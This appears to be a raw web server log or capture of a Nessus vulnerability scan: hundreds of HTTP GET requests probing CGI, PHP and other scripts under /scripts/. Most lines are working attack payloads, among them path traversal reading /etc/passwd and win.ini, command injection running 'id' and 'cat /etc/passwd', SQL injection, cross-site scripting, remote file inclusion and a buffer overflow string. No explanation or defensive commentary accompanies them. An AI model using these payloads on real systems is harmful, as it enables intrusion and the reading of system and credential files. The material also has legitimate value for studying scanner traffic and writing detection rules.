GET /scripts/index.pl/homels?func=add;class=WebGUI::Asset::Wobject::Article%3bprint%20%60id%60; HTTP/1.1
GET /scripts/index2.cgi?frames=yes&board=demo&mode=Current&threads=Collapse&message=../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /scripts/index2.php?_SERVER[]=&_SERVER[REMOTE_ADDR]='.system('id').exit().'&option=wrapper&module[module]=1 HTTP/1.1
GET /scripts/info.dat HTTP/1.1
GET /scripts/info.php HTTP/1.1
GET /scripts/info2www HTTP/1.1
GET /scripts/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id HTTP/1.1
GET /scripts/insertorder.cfm?CFID=1&CFTOKEN=1%20UNION%20SELECT%201%2c2%2c3%2c4%2cstorename%2c6%2c7%2c8%2c9%2c10%2c11%2c12%2c13%2c14%2c15%20from%20Params%22having%201%3d1 HTTP/1.1
GET /scripts/install.php?newlang=../../cpg_error.log%00 HTTP/1.1
GET /scripts/interface/index.do HTTP/1.1
GET /scripts/ion-p.exe?page=../../../../../etc/passwd HTTP/1.1
GET /scripts/ion-p.exe?page=c:\\\\winnt\\\\win.ini HTTP/1.1
GET /scripts/item.fts?href=%22%3E%3Cscript%3Ealert(%22ftgate_44002.nasl%22)%3C%2Fscript%3E%3B HTTP/1.1
GET /scripts/jammail.pl?job=showoldmail&mail=|id| HTTP/1.1
GET /scripts/javascript.php?abs_path=/etc/passwd%00 HTTP/1.1
GET /scripts/jcart-relay.php HTTP/1.1
GET /scripts/jgs_portal_statistik.php?meinaction=themen&month=1&year=1' HTTP/1.1
GET /scripts/js/scripts.php?load=/etc/passwd%00 HTTP/1.1
GET /scripts/js/vendors.php?file=../../../../../../../../../../etc/passwd%00nessus.js HTTP/1.1
GET /scripts/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor HTTP/1.1
GET /scripts/kernel/loadkernel.php?installPath=/etc/passwd%00 HTTP/1.1
GET /scripts/landesk/vboot/default.winpemanaged HTTP/1.1
GET /scripts/lang/index.php?file=/etc/passwd HTTP/1.1
GET /scripts/lang/lang.php?lang_path=/etc/passwd%00 HTTP/1.1
GET /scripts/language.php?data_dir=/etc/passwd%00 HTTP/1.1
GET /scripts/lg.php HTTP/1.1
GET /scripts/lib.inc.php?pm_path=http://xxxxxxxx&sfx=.txt HTTP/1.1
GET /scripts/lib/OWL_API.php?xrms_file_root=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /scripts/lib/adodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
GET /scripts/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7b%7dsystem(id)%3bclass%20zZz_ADOConnection%7b%7d%2f%2f HTTP/1.1
GET /scripts/lib/authform.inc.php?path_pre=/etc/passwd%00 HTTP/1.1
GET /scripts/lib/dbman_filter.inc.php?lib_path=/etc/passwd%00 HTTP/1.1
GET /scripts/lib/version.phps HTTP/1.1
GET /scripts/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
GET /scripts/library/adodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
GET /scripts/library/lib.php?root=http://xxxxxxxxxxx HTTP/1.1
GET /scripts/list.php HTTP/1.1
GET /scripts/listinfo/ HTTP/1.1
GET /scripts/listing.php HTTP/1.1
GET /scripts/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc| HTTP/1.1
GET /scripts/livre_include.php?no_connect=lol&chem_absolu=http://xxxxxx./ HTTP/1.1
GET /scripts/loader-wizard.php?page=default HTTP/1.1
GET /scripts/loadpage.cgi HTTP/1.1
GET /scripts/logbook.pl?file=../../../../../../../../../../bin/cat%20/etc/passwd%00| HTTP/1.1
GET /scripts/logicworks.ini HTTP/1.1
GET /scripts/login HTTP/1.1
GET /scripts/login.action HTTP/1.1
GET /scripts/login.cgi HTTP/1.1
GET /scripts/login.cgi?username=&command=simple&do=edit&password=&file=|id| HTTP/1.1
GET /scripts/login.jsp?lang=en&cntry= HTTP/1.1
GET /scripts/login.mako HTTP/1.1
GET /scripts/login.php HTTP/1.1
GET /scripts/login.php?course=\
GET /scripts/login.php?lang=/../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /scripts/login.php?lang=/../../../../../../../../../../../../etc/passwd%00.txt HTTP/1.1
GET /scripts/login.php?return=http://www.nessus.org/ HTTP/1.1
GET /scripts/login.php?url=editgedcoms.php HTTP/1.1
GET /scripts/login.php?user=\
GET /scripts/login.pl HTTP/1.1
GET /scripts/login.pl?login=ledgersmb_script_code_exec.nasl&script=-e%20print%20%22Content-Type%3a%20text%2fplain%0d%0a%0d%0a%22%3bsystem(id)&action=logout HTTP/1.1
GET /scripts/login.wdm HTTP/1.1
GET /scripts/login_page.php HTTP/1.1
GET /scripts/logs/HCDiskQuotaService.csv HTTP/1.1
GET /scripts/lostpass.php HTTP/1.1
GET /scripts/loudblog/inc/parse_old.php?template=@system(id);@&php_use=1&phpseparator=@ HTTP/1.1
GET /scripts/lp HTTP/1.1
GET /scripts/lp/AdminlogonPoint/Logon.do HTTP/1.1
GET /scripts/lsg2.cgi HTTP/1.1
GET /scripts/mail.cgi HTTP/1.1
GET /scripts/mail.php?id='/**/UNION/**/SELECT/**/1,2,1410939000,4--&blog=1 HTTP/1.1
GET /scripts/mailbox.php3?actionID=6&server=x&imapuser=x';somesql&pass=x HTTP/1.1
GET /scripts/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../etc/passwd HTTP/1.1
GET /scripts/main.php HTTP/1.1
GET /scripts/man-cgi?-P%20id%20ls HTTP/1.1
GET /scripts/man-cgi?section=0&topic=ls%3bid HTTP/1.1
GET /scripts/man2html?section=-P%20id&topic=w HTTP/1.1
GET /scripts/man2web?program=-P%20id%20ls HTTP/1.1
GET /scripts/manager/ HTTP/1.1
GET /scripts/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=/etc/passwd%00 HTTP/1.1
GET /scripts/mapserv.exe?map=mapserver_detect.nasl.map HTTP/1.1
GET /scripts/mapserv?map=mapserver_detect.nasl.map HTTP/1.1
GET /scripts/math_sum.mscgi HTTP/1.1
GET /scripts/mathtex.cgi?\\dvips\\dpi{150|id%20%3e%20%24(ps%20ax%20%7c%20fgrep%20%22mathtex_dpi_exec.nasl-1410938969%22%20%7c%20egrep%20%22%2f%5b0-9a-fA-F]%2b%5c.gif%22%20%7c%20tail%20-1%20%7c%20sed%20-n%20-e%20's%2f.*dvips.ps%20%2f%2f'%20-e%20's%2fgif%20%3econvert.*%2fgif%2fp'%20%7c%20tee%20%2ftmp%2ffoo4)%20%7c%20echo%20mathtex_dpi_exec.nasl-1410938969%20} HTTP/1.1
GET /scripts/mathtex.pl?\\dvips\\dpi{150|id%20%3e%20%24(ps%20ax%20%7c%20fgrep%20%22mathtex_dpi_exec.nasl-1410938969%22%20%7c%20egrep%20%22%2f%5b0-9a-fA-F]%2b%5c.gif%22%20%7c%20tail%20-1%20%7c%20sed%20-n%20-e%20's%2f.*dvips.ps%20%2f%2f'%20-e%20's%2fgif%20%3econvert.*%2fgif%2fp'%20%7c%20tee%20%2ftmp%2ffoo4)%20%7c%20echo%20mathtex_dpi_exec.nasl-1410938969%20} HTTP/1.1
GET /scripts/member.php?action=login HTTP/1.1
GET /scripts/member/index.php HTTP/1.1
GET /scripts/mensajeitor.php HTTP/1.1
GET /scripts/menu_dx.php?SITE_Path=../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /scripts/minis.php?month=../../../../../../etc/passwd HTTP/1.1
GET /scripts/misc.php?action=login HTTP/1.1
GET /scripts/misc/audio.php?recording=../version.inc HTTP/1.1
GET /scripts/misc/info.php HTTP/1.1
GET /scripts/mj_wwwusr HTTP/1.1
GET /scripts/mlog.html?screen=/etc/passwd HTTP/1.1
GET /scripts/mmstdod.cgi?ALTERNATE_TEMPLATES=|%20echo%20\
GET /scripts/module.php?module=osTicket&file=../../../../../../../../../../../etc/passwd HTTP/1.1
GET /scripts/module.php?module=osTicket&file=/modules/osTicket/admin.php HTTP/1.1
GET /scripts/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1 HTTP/1.1
GET /scripts/modules.php?name=My_eGallery HTTP/1.1
GET /scripts/modules/Printing/output.php?url=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== HTTP/1.1
GET /scripts/modules/TinyMCE/content_css.php?templateid=-1/**/UNION/**/SELECT/**/1410938973,1,1289952492-- HTTP/1.1
GET /scripts/modules/core/module.inc HTTP/1.1
GET /scripts/modules/news/ HTTP/1.1
GET /scripts/modules/phpRPC/server.php HTTP/1.1
GET /scripts/modules/projects/sql/install-0.9.7.php?p=2 HTTP/1.1
GET /scripts/month.php HTTP/1.1
GET /scripts/more.php?id=1' HTTP/1.1
GET /scripts/mpweb/html/help/000/user_help/help/output/config.js HTTP/1.1
GET /scripts/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd HTTP/1.1
GET /scripts/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini HTTP/1.1
GET /scripts/msg.txt HTTP/1.1
GET /scripts/mt.cgi?__mode=logout HTTP/1.1
GET /scripts/myevent.php?myevent_path=/etc/passwd%00 HTTP/1.1
GET /scripts/mylog.html?screen=/etc/passwd HTTP/1.1
GET /scripts/myphpPageTool/doc/admin/index.php?ptinclude-http://xxxxxxxx HTTP/1.1
GET /scripts/namazu.cgi HTTP/1.1
GET /scripts/nbmember.cgi?cmd=test HTTP/1.1
GET /scripts/ncbook.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 HTTP/1.1
GET /scripts/ncbook/ncbook.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 HTTP/1.1
GET /scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=NoU5SqhTNiryFOrEY HTTP/1.1
GET /scripts/neomail.pl HTTP/1.1
GET /scripts/nessus%22%3e%3cscript%3ealert('django_admin_xss.nasl')%3c%2fscript%3e%2f HTTP/1.1
GET /scripts/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd HTTP/1.1
GET /scripts/new-visitor.inc.php?lvc_include_dir=http://xxxxxxxx HTTP/1.1
GET /scripts/new_images.php?order=linpha_order_sql_injection.nasl_1410939020 HTTP/1.1
GET /scripts/news.mdb HTTP/1.1
GET /scripts/news.php HTTP/1.1
GET /scripts/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl HTTP/1.1
GET /scripts/news/index.dot?id=../../../../../../../../../../../..//etc/passwd%00.jpg HTTP/1.1
GET /scripts/newsdata/data/user.idx HTTP/1.1
GET /scripts/newsdesk.cgi?t=../../../../../../etc/passwd HTTP/1.1
GET /scripts/newsscript.pl?mode=admin HTTP/1.1
GET /scripts/nmap.php?target=|id HTTP/1.1
GET /scripts/normal_html.cgi?file=|id| HTTP/1.1
GET /scripts/notify?from=nessus\
GET /scripts/nph-exploitscanget.cgi?host=`id`&port=80&errchk=0&idsbypass=0 HTTP/1.1
GET /scripts/nph-mr.cgi HTTP/1.1
GET /scripts/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00 HTTP/1.1
GET /scripts/nph-proxy.cgi HTTP/1.1
GET /scripts/nph-test-cgi?* HTTP/1.0
GET /scripts/nquser.php HTTP/1.1
GET /scripts/nslookup.cgi?query=localhost%3bid&type=ANY&ns= HTTP/1.1
GET /scripts/nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=/etc/passwd%00 HTTP/1.1
GET /scripts/nx/common/cds/menu.inc.php?c_path=http://xxxxxxxx/ HTTP/1.1
GET /scripts/ohelp/en_US/Content/master/webadmin/WebAdmin.html HTTP/1.1
GET /scripts/op/op.Login.php?login=guest&sesstheme=default&lang=English HTTP/1.1
GET /scripts/open.php HTTP/1.1
GET /scripts/openwebmail.pl HTTP/1.1
GET /scripts/ovlaunch.exe HTTP/1.1
GET /scripts/p-news.php HTTP/1.1
GET /scripts/pafiledb.php HTTP/1.1
GET /scripts/pajax/pajax_call_dispatcher.php HTTP/1.1
GET /scripts/pals-cgi?palsAction=restart&documentName=/etc/passwd HTTP/1.1
GET /scripts/parse_xml.cgi?action=login&filename=frameset.html|id%00| HTTP/1.1
GET /scripts/password_reminder.php HTTP/1.1
GET /scripts/patch/index.php HTTP/1.1
GET /scripts/perl.exe?-v HTTP/1.1
GET /scripts/perl?-v HTTP/1.1
GET /scripts/pfdispaly.cgi?../../../../../../etc/passwd HTTP/1.1
GET /scripts/pfdispaly?../../../../../../etc/passwd HTTP/1.1
GET /scripts/phf?QALIAS=x%0a/bin/cat%20/etc/passwd HTTP/1.1
GET /scripts/photo.php?albumid=-696'%20UNION%20SELECT%201,concat(0x73,0x69,0x74,0x65,0x78,0x5f,0x61,0x6c,0x62,0x75,0x6d,0x69,0x64,0x5f,0x73,0x71,0x6c,0x69,0x2e,0x6e,0x61,0x73,0x6c),3,4,5,6,7,8%20--%20' HTTP/1.1
GET /scripts/php-ping.php?host=test&submit=Ping!&count=1|id|| HTTP/1.1
GET /scripts/php.cgi?/etc/passwd HTTP/1.1
GET /scripts/php/mytutos.php HTTP/1.1
GET /scripts/phpinfo.php HTTP/1.1
GET /scripts/phpnews/sendtofriend.php?mid='1' HTTP/1.1
GET /scripts/phpping/index.php?pingto=www.nessus.org%20|%20dir HTTP/1.1
GET /scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1410938849&lang_crm=../../../../../../../../../../../..//etc/passwd%00 HTTP/1.1
GET /scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1410938849&lang_crm=../../vtigerservice.php%00 HTTP/1.1
GET /scripts/phptonuke.php?filnavn=/etc/passwd HTTP/1.1
GET /scripts/plog-download.php?dl_type=album&checked[]='%20UNION%20SELECT%20'plogger_checked_sql_injection.nasl'%2c0%2c0%2c0%2c0%2c0%2c0%2c0%2c0%2c0%2c0%2c0%2c0%2c0%2c0%20--%20 HTTP/1.1
GET /scripts/plog-rss.php?level=collection&id=999%20OR%20plogger_id_sql_injection.nasl HTTP/1.1
GET /scripts/plugins/preview/preview.html HTTP/1.1
GET /scripts/plugins/safehtml/HTMLSax3.php?dir[plugins]=/etc/passwd%00 HTTP/1.1
GET /scripts/pm/add_ons/mail_this_entry/mail_authocheck.php?pm_path=http://xxxxxxxx./&sfx=.txt HTTP/1.1
GET /scripts/pmwiki.php HTTP/1.1
GET /scripts/pmwiki.php?GLOBALS[FarmD]=/etc/passwd%00 HTTP/1.1
GET /scripts/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/passwd%00 HTTP/1.1
GET /scripts/popup.php?include_path=/etc/passwd%00 HTTP/1.1
GET /scripts/port.php?proto=tcp' HTTP/1.1
GET /scripts/preferences.php?action=setcookie HTTP/1.1
GET /scripts/print.php?what=article&id=' HTTP/1.1
GET /scripts/printfaq.php?lng=en&pg=1 HTTP/1.1
GET /scripts/processSimple.do HTTP/1.1
GET /scripts/profil.php?id=1%20<scr ipt>foo</script> HTTP/1.1
GET /scripts/projects_site/uploadfile.php?demoSession=1 HTTP/1.1
GET /scripts/protection.php?action=logout&siteurl=/etc/passwd HTTP/1.1
GET /scripts/psunami.cgi?file=|id| HTTP/1.1
GET /scripts/pwcgi/smpwservicescgi.exe?TARGET=http://www.nessus.org HTTP/1.1
GET /scripts/query.cgi HTTP/1.1
GET /scripts/query?group=-- HTTP/1.1
GET /scripts/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd%00html HTTP/1.1
GET /scripts/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id= HTTP/1.1
GET /scripts/subdomain.domain.7z HTTP/1.1
GET /scripts/subdomain.domain.Z HTTP/1.1
GET /scripts/subdomain.domain.bz2 HTTP/1.1
GET /scripts/subdomain.domain.gz HTTP/1.1
GET /scripts/subdomain.domain.jar HTTP/1.1
GET /scripts/subdomain.domain.tld.7z HTTP/1.1
GET /scripts/subdomain.domain.tld.Z HTTP/1.1
GET /scripts/subdomain.domain.tld.bz2 HTTP/1.1
GET /scripts/subdomain.domain.tld.gz HTTP/1.1
GET /scripts/subdomain.domain.tld.jar HTTP/1.1
GET /scripts/subdomain.domain.tld.rar HTTP/1.1
GET /scripts/subdomain.domain.tld.tar HTTP/1.1
GET /scripts/subdomain.domain.tld.tar.bz2 HTTP/1.1
GET /scripts/subdomain.domain.tld.tar.gz HTTP/1.1
GET /scripts/subdomain.domain.tld.tgz HTTP/1.1
GET /scripts/subdomain.domain.tld.war HTTP/1.1
GET /scripts/subdomain.domain.tld.z HTTP/1.1
GET /scripts/subdomain.domain.tld.zip HTTP/1.1
GET /scripts/subdomain.domain.rar HTTP/1.1
GET /scripts/subdomain.domain.tar HTTP/1.1
GET /scripts/subdomain.domain.tar.bz2 HTTP/1.1
GET /scripts/subdomain.domain.tar.gz HTTP/1.1
GET /scripts/subdomain.domain.tgz HTTP/1.1
GET /scripts/subdomain.domain.war HTTP/1.1
GET /scripts/subdomain.domain.z HTTP/1.1
GET /scripts/subdomain.domain.zip HTTP/1.1
GET /scripts/recordings/index.php HTTP/1.1
GET /scripts/remindpasswd HTTP/1.1
GET /scripts/remotehtmlview.php?phpAds_path=http://xxxxxxxx HTTP/1.1
GET /scripts/resetpw.php?email=../../../../../../../../../../../../etc/passwd HTTP/1.1
GET /scripts/rest/api/2.0.alpha1/serverInfo HTTP/1.1
GET /scripts/rest/api/2/serverInfo HTTP/1.1
GET /scripts/review.php?id=1&cat=&subcat=%22%3E%3cscript%3ealert('phpmydirectory_multiple_xss.nasl')%3b%3c%2fscript%3e HTTP/1.1
GET /scripts/roschedule.php HTTP/1.1
GET /scripts/rot13sj.cgi?/etc/passwd HTTP/1.1
GET /scripts/rpc.php?cmd=display_get_requesters&id=1 HTTP/1.1
GET /scripts/rss.php?blogId=1&profile=../../config/config.properties.php%00 HTTP/1.1
GET /scripts/s_form.cgi HTTP/1.1
GET /scripts/samba/smb2www.pl HTTP/1.1
GET /scripts/samples/sample_posteddata.php HTTP/1.1
GET /scripts/save.php?file_save=/etc/passwd HTTP/1.1
GET /scripts/sawmill6cl.exe?ho+{COMPLETE_VERSION} HTTP/1.1
GET /scripts/sawmillcl.exe?ho+{COMPLETE_VERSION} HTTP/1.1
GET /scripts/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini%00gwextranet_template_dir_traversal.nasl HTTP/1.1
GET /scripts/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=%3C/option%3E%3C/SELECT%3E%3C?phpinfo();?%3E HTTP/1.1
GET /scripts/sdbsearch.cgi?stichwort=anything HTTP/1.1
GET /scripts/search HTTP/1.1
GET /scripts/search.aspx HTTP/1.1
GET /scripts/search.cfm HTTP/1.1
GET /scripts/search.cgi HTTP/1.1
GET /scripts/search.cgi?..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
GET /scripts/search.cgi?..\\..\\..\\..\\..\\..\\winnt\\win.ini HTTP/1.1
GET /scripts/search.exe HTTP/1.1
GET /scripts/search.jsp?q=%25%22%3cscript%3ealert(1410938809)%3c/script%3e HTTP/1.1
GET /scripts/search.php HTTP/1.1
GET /scripts/search.php?Submit=true&search='); HTTP/1.1
GET /scripts/search.php?allwords=<br><scr ipt>foo</script>&cid=0&title=1&desc=1 HTTP/1.1
GET /scripts/search.php?getdate=./templates/default/admin.tpl HTTP/1.1
GET /scripts/search.pl HTTP/1.1
GET /scripts/search.pl?form=../../../../../../etc/passwd%00 HTTP/1.1
GET /scripts/search/results.stm?indexname=>\
GET /scripts/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc HTTP/1.1
GET /scripts/search/show.pl?url=file:/etc/passwd HTTP/1.1
GET /scripts/search/show.pl?url=http://www.google.com HTTP/1.1
GET /scripts/search=%3Cscript%3Ealert('XSS')%3C/script%3E HTTP/1.1
GET /scripts/search?q=http://www.nessus.org/ HTTP/1.1
GET /scripts/secure.php?cfgProgDir=/etc/passwd%00 HTTP/1.1
GET /scripts/secure/Dashboard.jspa HTTP/1.1
GET /scripts/sendcard.php?view=1&id=%27sendcard_sql.nasl HTTP/1.1
GET /scripts/sendtemp.pl?templ=../../../../../etc/passwd HTTP/1.1
GET /scripts/server.pt?in_ra_groupoperator_1=and&in_hi_userid=1&in_hi_req_objtype=1&space=SearchResult&in_tx_fulltext=*&in_hi_groupoperator_1=and&parentid=1&in_hi_req_apps=1&cached=false&control=advancedstart&in_hi_revealed_1=0&in_hi_req_page=10&in_hi_depth_1=0&in_hi_totalgroups=1&parentname=AdvancedSearch&in_ra_topoperator=and HTTP/1.1
GET /scripts/server.pt?open=space&name=%22%3b%7d%3c%2fscript%3e%3cscript%3ealert('plumtree_name_xss.nasl')%3c%2fscript%3e HTTP/1.1
GET /scripts/server/s3_download.php HTTP/1.1
GET /scripts/services/Walrus HTTP/1.1
GET /scripts/services/help/?module=horde&show=about HTTP/1.1
GET /scripts/services/help/?module=horde&show=menu HTTP/1.1
GET /scripts/session/login.php?dest=nessus%22%3e%3cscript%3ealert('ossim_dest_xss.nasl')%3c%2fscript%3e%3c!--%20 HTTP/1.1
GET /scripts/setcookie.php?u=../../../../../../../../../../../../etc/passwd%00&plugin=pblang_mult_flaws.nasl HTTP/1.1
GET /scripts/settemplate.php HTTP/1.1
GET /scripts/settings/site.ini HTTP/1.1
GET /scripts/setup.php HTTP/1.1
GET /scripts/sgdynamo.exe?HTNAME=<scr ipt>foo</script> HTTP/1.1
GET /scripts/sgdynamo.exe?HTNAME=sgdynamo.exe HTTP/1.1
GET /scripts/shared/help.php?page=../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /scripts/shop.plx HTTP/1.1
GET /scripts/shop.plx/page=nessus2097437195 HTTP/1.1
GET /scripts/shopaddtocart.asp?productid='42 HTTP/1.1
GET /scripts/shopexd.asp?catalogid='42 HTTP/1.1
GET /scripts/shopper.cgi?newpage=../../../../../../etc/passwd HTTP/1.1
GET /scripts/shoutbox.php?conf=../ HTTP/1.1
GET /scripts/shoutbox.php?conf=../../../../../../../../etc/passwd HTTP/1.1
GET /scripts/showcat.php?cat=1' HTTP/1.1
GET /scripts/showproduct.php?product=1' HTTP/1.1
GET /scripts/simple/view_page?mv_arg=|cat%20/etc/passwd| HTTP/1.1
GET /scripts/siteframe.php?LOCAL_PATH=macros/100-siteframe.macro%00 HTTP/1.1
GET /scripts/sitemap.xml HTTP/1.1
GET /scripts/smb2www.pl HTTP/1.1
GET /scripts/smpwservicescgi.exe HTTP/1.1
GET /scripts/snpfiltered.pl?t=c&u=<scr ipt>foo</script> HTTP/1.1
GET /scripts/sojourn.cgi?cat=../../../../../etc/passwd%00 HTTP/1.1
GET /scripts/source?v=../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /scripts/sources/functions.php?root_path=/etc/passwd%00 HTTP/1.1
GET /scripts/spaw/dialogs/confirm.php?spaw_root=/etc/passwd%00 HTTP/1.1
GET /scripts/sql.php3?LIB_INC=1&btnDrop=No&goto=/etc/passwd HTTP/1.1
GET /scripts/sql.php?LIB_INC=1&btnDrop=No&goto=/etc/passwd HTTP/1.1
GET /scripts/sql/install-0.9.7.php?p=2 HTTP/1.1
GET /scripts/squirrelcart/cart_content.php?cart_isp_root=/etc/passwd%00 HTTP/1.1
GET /scripts/sqwebmail?redirect=%0d%0a%0d%0asqwebmail_http_splitting.nasl HTTP/1.1
GET /scripts/src/login.php HTTP/1.1
GET /scripts/src/redirect.php HTTP/1.1
GET /scripts/starnet/addons/slideshow_full.php?album_name='103378728 HTTP/1.1
GET /scripts/starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd%00 HTTP/1.1
GET /scripts/start.action HTTP/1.1
GET /scripts/status.php3 HTTP/1.1
GET /scripts/store.cgi?StartID=../../../../../../../../../etc/passwd%00.html HTTP/1.1
GET /scripts/store.php?crn=42'&action=show&show_products_mode=cat_click HTTP/1.1
GET /scripts/story.pl?next=../../../../../etc/passwd%00 HTTP/1.1
GET /scripts/styles.php?toroot=/etc/passwd%00 HTTP/1.1
GET /scripts/subsystems/permissions.info.php HTTP/1.1
GET /scripts/sugarcrm/modules/Users/Login.php?theme=../../../../../../../etc/passwd%00 HTTP/1.1
GET /scripts/superguestconfig HTTP/1.1
GET /scripts/supporter/tupdate.php?groupid=change&sg=' HTTP/1.1
GET /scripts/survey.inc.php?path=/etc/passwd%00 HTTP/1.1
GET /scripts/swc?ctr=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1
GET /scripts/sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id HTTP/1.1
GET /scripts/test-cgi?* HTTP/1.0
GET /scripts/test.php HTTP/1.1
GET /scripts/tests/test_tools/selenium/core/SeleniumLog.html HTTP/1.1
GET /scripts/texis.exe/?-dump HTTP/1.1
GET /scripts/texis.exe/nessus HTTP/1.1
GET /scripts/themes/program/themesettings.inc.php?themesdir=/etc/passwd%00 HTTP/1.1
GET /scripts/tiki-index.php HTTP/1.1
GET /scripts/tinfo.php?id=1410939051 HTTP/1.1
GET /scripts/tinybrowser/upload.php?badfiles=1><scr ipt>alert('tinybrowser_multiple_xss.nasl')</script> HTTP/1.1
GET /scripts/tombstone.cfm?ProfileID=<scr ipt>foo</script> HTTP/1.1
GET /scripts/tomcat_proxy_directory_traversal.nasl1410939029 HTTP/1.1
GET /scripts/top.php?header=../../../../../../../../etc/passwd HTTP/1.1
GET /scripts/topic.php?tid='select HTTP/1.1
GET /scripts/tree.php HTTP/1.1
GET /scripts/tst.bat|type%20c:\\windows\\win.ini HTTP/1.1
GET /scripts/tst.bat|type%20c:\\winnt\\win.ini HTTP/1.1
GET /scripts/tsweb.asp HTTP/1.1
GET /scripts/tsweb/ HTTP/1.1
GET /scripts/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd HTTP/1.1
GET /scripts/ttx.cgi HTTP/1.1
GET /scripts/typo3/index.php HTTP/1.1
GET /scripts/ubbthreads.php HTTP/1.1
GET /scripts/update.php HTTP/1.1
GET /scripts/update.php?op=info HTTP/1.1
GET /scripts/upgrade/index.php HTTP/1.1
GET /scripts/upgradev1.php HTTP/1.1
GET /scripts/upload.cgi HTTP/1.1
GET /scripts/upload/upload-submit.do HTTP/1.1
GET /scripts/user.cgi?url=\
GET /scripts/user.php HTTP/1.1
GET /scripts/users/users.php HTTP/1.1
GET /scripts/usrdetails.php?sgnuptype=csaleID<scr ipt>nessus</script> HTTP/1.1
GET /scripts/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd HTTP/1.1
GET /scripts/vhost.php?action=logout&time=1410938657 HTTP/1.1
GET /scripts/viart_shop.xml HTTP/1.1
GET /scripts/view.php?PG=foobar HTTP/1.1
GET /scripts/view/System/WebHome?rev=1 HTTP/1.1
GET /scripts/view/TWiki/WebHome HTTP/1.1
GET /scripts/view_user.php?list=1&letter=&sort_by='select HTTP/1.1
GET /scripts/viewcvs.cgi/ HTTP/1.1
GET /scripts/viewcvs.cgi/?cvsroot=<scr ipt>foo</script> HTTP/1.1
GET /scripts/viewpage.php?file=/etc/passwd HTTP/1.1
GET /scripts/w3who.dll HTTP/1.1
GET /scripts/wa.cgi?DEBUG-SHOW-VERSION HTTP/1.1
GET /scripts/wa.exe?DEBUG-SHOW-VERSION HTTP/1.1
GET /scripts/wa?DEBUG-SHOW-VERSION HTTP/1.1
GET /scripts/way-board/way-board.cgi?db=/etc/passwd%00 HTTP/1.1
GET /scripts/wc.dll?wwMaint~EditConfig HTTP/1.1
GET /scripts/webadmin.php?show=%2Fetc%2Fpasswd HTTP/1.1
GET /scripts/webapp/home.html?0 HTTP/1.1
GET /scripts/webappmon.exe?ins=nowait&act=natping&sel=%22255.255.255.255%20%26%20id%26%22 HTTP/1.1
GET /scripts/webboard/generate.cgi HTTP/1.1
GET /scripts/webc.cgi/ HTTP/1.1
GET /scripts/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;id|&CODE=PHOLD HTTP/1.1
GET /scripts/webdist.cgi?distloc=;id HTTP/1.1
GET /scripts/webglimpse.cgi HTTP/1.1
GET /scripts/webplus.exe?script=webplus_install_path.nasl HTTP/1.1
GET /scripts/webplus?script=/../../../../etc/passwd HTTP/1.1
GET /scripts/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd HTTP/1.1
GET /scripts/webwho.pl HTTP/1.1
GET /scripts/welcome.php?custom_welcome_page=/etc/passwd%00 HTTP/1.1
